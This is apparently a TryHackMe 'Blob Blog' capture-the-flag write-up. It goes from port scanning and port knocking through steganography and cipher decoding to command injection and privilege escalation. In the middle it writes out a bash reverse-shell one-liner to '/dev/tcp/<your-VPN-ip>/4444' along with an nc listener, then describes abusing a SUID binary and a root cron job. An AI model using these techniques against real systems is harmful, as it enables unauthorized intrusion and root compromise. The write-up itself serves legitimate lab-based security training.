The Blob Blog — TryHackMe — Writeup

Hello. I’m Rahmos. Here is my The Blob Blog — TryHackMe — Writeup. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -p- -T4 -v <ip>

nmap

There are 2 ports opened: 22 (SSH), 80 (HTTP). Let’s first access the website:

website

It’s a default Apache website. Check page source (Ctrl + U):

page source

page source

Ok so now I know Bob’s password, but encoded with Base58. Also a very long string at top of the page, which was encoded with Base64. I will decode it using http://icyberchef.com

base64

It’s Brainfuck program language. Put it to this link to decode and it’s a sentence:

When I was a kid, my friends and I would always knock on 3 of our neighbors doors. Always houses 1, then 3, then 5!

I don’t know what it’s for, so just leave it there.

Move to decode Bob’s password From Base58:

decode Bob’s password

Now I’ve got bob’s password. Let’s try to login to SSH as bob:

ssh

Wait, it’s not the SSH password! 😣

Take a look again at the sentence above, looks like it’s something about “knock” and 1 3 5. I will try knockd to “knock” the port of this machine:

knockd

you can install it using apt:

apt-get install knockd

Then “knock” the machine:

knock <ip> 1 3 5

Then, nmap again:

nmap

3 more ports opened: 21 (FTP), 445 (HTTP), 8080 (HTTP).

So I guess the password for Bob above is for FTP, let’s login to FTP as bob:

ftp as bob

And yes, we are in! Move around to view files:

view files

So there’s an image “cool.jpeg” inside /ftp/files. Transfer it to our machine using get:

get cool.jpeg

get

It’s everything I can find at FTP. Now let’s extract the hidden data inside this image using steghide:

steghide extract -sf cool.jpeg

However, I cannot extract anything from this image without the password.

steghide

So let’s move to access the website at port 445:

port 445

I’ve got 1 more password. Looks like it’s the password to extract hidden data inside “cool.jpeg”. Let’s try extract again:

steghide

And yes! It’s the correct password. Let’s see the hidden data:

out.txt

Another hidden dir appears. Access this dir on port 445:

hidden dir

So now I’ve got another password. What about the zcv:…? Looks like it’s encoded, let’s put it to CyberChef (icyberchef.com) to decode.

Decode from Vigenère, enter the password above as key and:

decode

Boom! Now I’ve got Bob’s credential to login to “blog”. Now what I need to find is location of the “blog” to login.

Let’s scan for other hidden dirs on port 445 using gobuster:

gobuster dir -u http://<ip>:445/ -w /path-to-wordlist

gobuster port 445

Let’s access /user:

/user

Well is it a private SSH key? No, because it’s not the right format of ssh RSA private key. Just leave it there for now.

Access website at port 8080:

port 8080

It’s also a default Apache website. Again, scan for hidden dirs using gobuster:

gobuster port 8080

Access /login:

/login

Ah yes! Here’s where I can login to “blog”. Enter the credential above to login:

/blog

I’m in! Let’s put something to the box Review me!, click submit and then view the latest review:

Well my review has been submitted to /review. What if I put some command into review….?

The code has been executed! Which means I can start a reverse shell into the machine!

First, start a listener on your machine:

nc -lvnp 4444

Then, enter this command to review and submit:

/bin/bash -c ‘/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1’

Then access /review and I’ve got the shell!

reverse shell

Spawn a tty shell using Python:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

export TERM =xterm

After a while, a message appears:

message

So now I know there’s a cronjob running, which prints this message to board. I will use a script called “pspy32” to watch the job running on this machine:

pspy32

So each min a cronjob will compile and execute a C program inside /home/bobloblaw/Documents. And also, it will zip the file backup to /tmp. However, I cannot access inside bobloblaw folder now. So let’s transfer this backup file to my machine and extract. I’ll use scp:

scp backup.tar.gz username@<ip>:/home/username

Extract, it’s a file called “blobblog.txt” inside, let’s read its content:

blobblog.txt

It’s the same SSH key as the key I’ve found at <ip>:445/user. So I cannot use it either 😣

Let’s try another way. This time, use “find” to look for SUID bit command:

find / -perm -u=s 2>dev/null

find

This program is not the default one of Linux. So let’s see what it does:

Hmm it only prints out this line? I don’t think so. Transfer it to my machine and use ghidra to decompile. Again, I’ll use scp to transfer.

ghidra

Well, if I execute this program without correct params, it will print out “Order my blogs!”. But if I provide 6 params, it will loop through 7 times, and check with “iVar1”. If the input params don’t properly match 7 — times it has looped, it exits the program. On each iteration, ‘iVar1’ is shifting to the next parameter being inputted. This means it’s looking for 6 parameters in reverse order. So I will provide the params as “ 6 5 4 3 2 1” for it to execute “/bin/sh”:

Ah yes! Now I have the shell as boblowlaw. Again spawn a tty shell using Python and move around to find the first flag.

find

Get the first flag:

user.txt

Now let’s find a way to own root! I’ve known before that there’s a cronjob running program in bobloblaw’s Documents. So let’s access it.

the “.still_boring” will be run every min as root. I cannot modify this program, but I can modify its sourcecode: “.boring_file.c”

I will edit the file to spawn a reverse shell, and because it run as root, so I will have the root shell! Here’s my example code:

The blank white box will be your VPN ip. Save the file, start a listener on port 5555, and wait 1 min:

root shell

Now I’m root! Get the final flag:

root.txt

The end.

HAPPY HACKING